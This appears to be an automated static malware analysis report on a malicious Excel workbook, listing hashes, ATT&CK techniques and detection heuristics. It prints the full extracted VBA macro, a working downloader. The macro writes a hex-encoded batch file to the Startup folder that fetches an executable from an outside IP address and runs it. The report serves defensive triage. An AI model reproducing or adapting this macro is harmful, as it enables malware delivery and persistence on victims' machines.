Malicious Office (OOXML) / .XLSX — malware analysis report

Static analysis result for SHA-256 136b7155ecedf085…

MALICIOUS

Office (OOXML) / .XLSX

70.1 KB Created: 2015-06-05 18:17:20 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2022-08-06
MD5: 43e366bf2aaca9da55de7c14353be322 SHA-1: 4dbd84437d41b133e9443ce1d1f8717843c12b13 SHA-256: 136b7155ecedf0855ceea32694b39ac6e0ea15d7c3ab8eabc7104472e47f74da
170 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1059.003 Windows Command Shell T1105 Ingress Tool Transfer

The Workbook_Open macro uses CreateObject("WScript.Shell") to write a batch file named 'e038ff73.bat' to the user's Startup folder. This batch file, constructed from concatenated hex values, appears to download and execute a VBScript payload ('e038ff73.vbs'). The script's intent is to establish persistence and likely download a second-stage payload.

Heuristics 6

  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    sf = CreateObject("WScript.Shell").SpecialFolders("Startup")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    sf = CreateObject("WScript.Shell").SpecialFolders("Startup")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Private Sub Workbook_Open()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 6471 bytes
SHA-256: 6f97d20c2559d33157c935c306e48519b9048378bdc569a05b911669ef2ac468
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 21 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
Dim sf
sf = CreateObject("WScript.Shell").SpecialFolders("Startup")
Set File = CreateObject("Scripting.FileSystemObject").CreateTextFile(sf & "\e038ff73.bat", True)
Dim hex1
hex1 = "6563686F206F66660A64656C202F712F662F73202574656D70255C65303338666637332E7662730A64656C202F712F662F73202574656D70255C653033386666"
Dim count1
count1 = Len(hex1)
For i = 1 To count1 Step 2
    File.Write Chr(CInt("&h" & Mid(hex1, i, 2)))
Next
Dim hex2
hex2 = "37332E6578650A5345542066663D2574656D70255C65303338666637332E7662730A5345542070313D44696D20683A0A5345542070323D2053657420680A5345"
Dim count2
count2 = Len(hex2)
For i = 1 To count2 Step 2
    File.Write Chr(CInt("&h" & Mid(hex2, i, 2)))
Next
Dim hex3
hex3 = "542070333D203D204372650A5345542070343D6174654F626A0A5345542070353D65637428224D0A5345542070363D6963726F736F0A5345542070373D66742E"
Dim count3
count3 = Len(hex3)
For i = 1 To count3 Step 2
    File.Write Chr(CInt("&h" & Mid(hex3, i, 2)))
Next
Dim hex4
hex4 = "584D4C0A5345542070383D4854545022290A6563686F202570312525703225257033252570342525703525257036252570372525703825203E3E20256666250A"
Dim count4
count4 = Len(hex4)
For i = 1 To count4 Step 2
    File.Write Chr(CInt("&h" & Mid(hex4, i, 2)))
Next
Dim hex5
hex5 = "5345542070313D44696D20733A0A5345542070323D2053657420730A5345542070333D203D204372650A5345542070343D6174654F626A0A5345542070353D65"
Dim count5
count5 = Len(hex5)
For i = 1 To count5 Step 2
    File.Write Chr(CInt("&h" & Mid(hex5, i, 2)))
Next
Dim hex6
hex6 = "63742822410A5345542070363D646F64622E530A5345542070373D747265616D220A5345542070383D29200A6563686F20257031252570322525703325257034"
Dim count6
count6 = Len(hex6)
For i = 1 To count6 Step 2
    File.Write Chr(CInt("&h" & Mid(hex6, i, 2)))
Next
Dim hex7
hex7 = "2525703525257036252570372525703825203E3E20256666250A5345542070313D682E4F70656E0A5345542070323D2022474554220A5345542070333D2C2022"
Dim count7
count7 = Len(hex7)
For i = 1 To count7 Step 2
    File.Write Chr(CInt("&h" & Mid(hex7, i, 2)))
Next
Dim hex8
hex8 = "6874740A5345542070343D703A2F2F31370A5345542070353D382E31382E320A5345542070363D34302E3230370A5345542070373D2F70726976610A53455420"
Dim count8
count8 = Len(hex8)
For i = 1 To count8 Step 2
    File.Write Chr(CInt("&h" & Mid(hex8, i, 2)))
Next
Dim hex9
hex9 = "70383D74652F636F6D0A5345542070393D70616E795F640A534554207031303D657461696C730A534554207031313D2F6162632E650A534554207031323D7865"
Dim count9
count9 = Len(hex9)
For i = 1 To count9 Step 2
    File.Write Chr(CInt("&h" & Mid(hex9, i, 2)))
Next
Dim hex10
hex10 = "222C20460A534554207031333D616C7365200A6563686F2025703125257032252570332525703425257035252570362525703725257038252570392525703130"
Dim count10
count10 = Len(hex10)
For i = 1 To count10 Step 2
    File.Write Chr(CInt("&h" & Mid(hex10, i, 2)))
Next
Dim hex11
hex11 = "25257031312525703132252570313325203E3E20256666250A5345542070313D682E53656E640A6563686F2025703125203E3E20256666250A5345542070313D"
Dim count11
count11 = Len(hex11)
For i = 1 To count11 Step 2
    File.Write Chr(CInt("&h" & Mid(hex11, i, 2)))
Next
Dim hex12
hex12 = "663D204372650A5345542070323D6174654F626A0A5345542070333D6563742822530A5345542070343D6372697074690A5345542070353D6E672E46696C0A53"
Dim count12
count12 = Len(hex12)
For i = 1 To count12 Step 2
    File.Write Chr(CInt("&h" & Mid(hex12, i, 2)))
Next
Dim hex13
hex13 = "45542070363D6553797374650A5345542070373D6D4F626A65630A5345542070383D7422292E47650A5345542070393D7453706563690A534554207031303D61"
Dim count13
count13 = Len(hex13)
For i = 1 To count13 Step 2
    File.Write Chr(CInt("&h" & Mid(hex13, i, 2)))
Next
Dim hex14
hex14 = "6C466F6C640A534554207031313D6572283229200A534554207031323D2B20222F65300A534554207031333D3338666637330A534554207031343D2E65786522"
Dim count14
count14 = Len(hex14)
For i = 1 To count14 Step 2
    File.Write Chr(CInt("&h" & Mid(hex14, i, 2)))
Next
Dim hex15
hex15 = "200A6563686F20257031252570322525703325257034252570352525703625257037252570382525703925257031302525703131252570313225257031332525"
Dim count15
count15 = Len(hex15)
For i = 1 To count15 Step 2
    File.Write Chr(CInt("&h" & Mid(hex15, i, 2)))
Next
Dim hex16
hex16 = "70313425203E3E20256666250A5345542070313D5769746820730A6563686F2025703125203E3E20256666250A5345542070313D2E54797065200A5345542070"
Dim count16
count16 = Len(hex16)
For i = 1 To count16 Step 2
    File.Write Chr(CInt("&h" & Mid(hex16, i, 2)))
Next
Dim hex17
hex17 = "323D3D2031200A6563686F202570312525703225203E3E20256666250A5345542070313D2E4F70656E200A6563686F2025703125203E3E20256666250A534554"
Dim count17
count17 = Len(hex17)
For i = 1 To count17 Step 2
    File.Write Chr(CInt("&h" & Mid(hex17, i, 2)))
Next
Dim hex18
hex18 = "2070313D2E77726974650A5345542070323D20682E7265730A5345542070333D706F6E7365420A5345542070343D6F6479200A6563686F202570312525703225"
Dim count18
count18 = Len(hex18)
For i = 1 To count18 Step 2
    File.Write Chr(CInt("&h" & Mid(hex18, i, 2)))
Next
Dim hex19
hex19 = "2570332525703425203E3E20256666250A5345542070313D2E73617665740A5345542070323D6F66696C65200A5345542070333D662C2032200A6563686F2025"
Dim count19
count19 = Len(hex19)
For i = 1 To count19 Step 2
    File.Write Chr(CInt("&h" & Mid(hex19, i, 2)))
Next
Dim hex20
hex20 = "7031252570322525703325203E3E20256666250A5345542070313D456E642057690A5345542070323D74680A6563686F202570312525703225203E3E20256666"
Dim count20
count20 = Len(hex20)
For i = 1 To count20 Step 2
    File.Write Chr(CInt("&h" & Mid(hex20, i, 2)))
Next
Dim hex21
hex21 = "250A7374617274202F57202574656D70255C65303338666637332E7662730A7374617274202574656D70255C65303338666637332E6578650A64656C202530"
Dim count21
count21 = Len(hex21)
For i = 1 To count21 Step 2
    File.Write Chr(CInt("&h" & Mid(hex21, i, 2)))
Next
File.Close
End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 19456 bytes
SHA-256: ebc2eebe2ca8ee39a2f8c7e7c7a334cd7b4c585ce83cf6e097d45628269c94d9
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 21 long base64-like blob(s).

Open this report in the interactive analyzer, or submit your own file for analysis.